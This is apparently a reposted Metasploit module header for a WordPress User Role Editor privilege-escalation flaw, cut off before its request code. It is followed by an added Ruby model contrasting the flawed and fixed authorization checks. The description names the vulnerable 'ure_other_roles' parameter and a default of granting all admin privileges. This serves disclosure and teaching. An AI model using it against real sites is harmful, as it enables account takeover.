WordPress Plugin User Role Editor





Source: metasploit.com
Author: Paskalev
Published: 2018-05-07

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HTTP::Wordpress

  def initialize(info = {})
    super(update_info(
      info,
      'Name' => 'WordPress User Role Editor Plugin Privilege Escalation',
      'Description' => %q{
        The WordPress User Role Editor plugin prior to v4.25, is lacking an authorization
        check within its update user profile functionality ("update" function, contained
        within the "class-user-other-roles.php" module).
        Instead of verifying whether the current user has the right to edit other users'
        profiles ("edit_users" WP capability), the vulnerable function verifies whether the
        current user has the rights to edit the user ("edit_user" WP function) specified by
        the supplied user id ("user_id" variable/HTTP POST parameter). Since the supplied
        user id is the current user's id, this check is always bypassed (i.e. the current
        user is always allowed to modify its profile).
        This vulnerability allows an authenticated user to add arbitrary User Role Editor
        roles to its profile, by specifying them via the "ure_other_roles" parameter within
        the HTTP POST request to the "profile.php" module (issued when "Update Profile" is
        clicked).
        By default, this module grants the specified WP user all administrative privileges,
        existing within the context of the User Role Editor plugin.
      },
      'Author' => [
        'ethicalhack3r',    # Vulnerability discovery
        'Tomislav Paskalev' # Exploit development, metasploit module
      ],
      'License' => MSF_LICENSE,
      'References' => [
        ['WPVDB', '8432'],
        ['URL', 'https://www.wordfence.com/blog/2016/04/user-role-editor-vulnerability/']
      ],
      'DisclosureDate' => 'Apr 05 2016',
    ))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'URI path to WordPress', '/']),
        OptString.new('ADMINPATH', [true, 'wp-admin directory', 'wp-admin/']),
        OptString.new('CONTENTPATH', [true, 'wp-content directory', 'wp-content/']),
        OptString.new('PLUGINSPATH', [true, 'wp plugins directory', 'plugins/']),
        OptString.new('PLUGINPATH', [true, 'User Role Editor directory', 'user-role-editor/']),
        OptString.new('USERNAME', [true, 'WordPress username']),
        OptString.new('PASSWORD', [true, 'WordPress password']),
        OptString.new('PRIVILEGES', [true, 'Desired User Role Editor privileges', 'activate_plugins,delete_others_pages,delete_others_posts,delete_pages,delete_posts,delete_private_pages,delete_private_posts,delete_published_pages,delete_pu...
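
The authorization flaw that the module's description explains (gating the role update on the per-user "edit_user" check rather than on the "edit_users" capability), modelled in Ruby next to the corrected check. This is an added example, not code from the module or the plugin; the struct, the function names and the sample users are hypothetical, and the permission model is a simplification of WordPress's.

```ruby
# Simplified model of the check described above; not the plugin's PHP.
# All names here are hypothetical.
User = Struct.new(:id, :roles, :caps)

# Per-user "edit_user" check: always true for one's own profile; editing
# anyone else requires the "edit_users" capability.
def can_edit_user?(actor, target_id)
  actor.id == target_id || actor.caps.include?('edit_users')
end

# Merges the comma-separated "ure_other_roles" value into the target's roles.
def apply_other_roles(users, params)
  target = users.fetch(params['user_id'])
  target.roles |= params.fetch('ure_other_roles', '').split(',')
  true
end

# Flawed handler: asks "may the actor edit this profile?", which is always
# true when user_id is the actor's own id, then applies the submitted roles.
def update_other_roles_vulnerable(actor, users, params)
  return false unless can_edit_user?(actor, params['user_id'])
  apply_other_roles(users, params)
end

# Corrected handler: changing roles requires the "edit_users" capability,
# whoever's profile is being saved.
def update_other_roles_fixed(actor, users, params)
  return false unless actor.caps.include?('edit_users')
  apply_other_roles(users, params)
end

# Constructed sample data: one administrator, one low-privileged user.
def sample_users
  { 1 => User.new(1, ['administrator'], %w[read edit_users]),
    2 => User.new(2, ['subscriber'], ['read']) }
end

# Sends the same self-profile request through both handlers and returns the
# low-privileged user's resulting roles in each case.
def demo
  req = { 'user_id' => 2, 'ure_other_roles' => 'activate_plugins' } # constructed
  vuln = sample_users
  update_other_roles_vulnerable(vuln[2], vuln, req)
  fixed = sample_users
  accepted = update_other_roles_fixed(fixed[2], fixed, req)
  { vulnerable: vuln[2].roles, fixed: fixed[2].roles, fixed_accepted: accepted }
end

p demo if __FILE__ == $PROGRAM_NAME
```

The corrected handler still lets an account holding "edit_users" assign roles, so the fix removes only the self-service path.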